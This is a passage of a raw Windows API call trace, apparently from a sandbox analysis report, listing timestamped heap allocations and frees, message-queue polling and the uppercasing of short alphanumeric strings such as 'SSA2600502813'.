dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0113.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0113.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.701] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0113.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0113.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0113.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0113.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0113.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.704] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0113.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0113.704] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0113.705] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0113.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0113.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0113.705] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f88 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b30 [0113.705] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0113.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0113.706] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0113.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0113.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0113.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0113.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0113.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0113.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b30 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0113.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0113.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.708] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0113.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f88 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0113.709] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0113.709] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 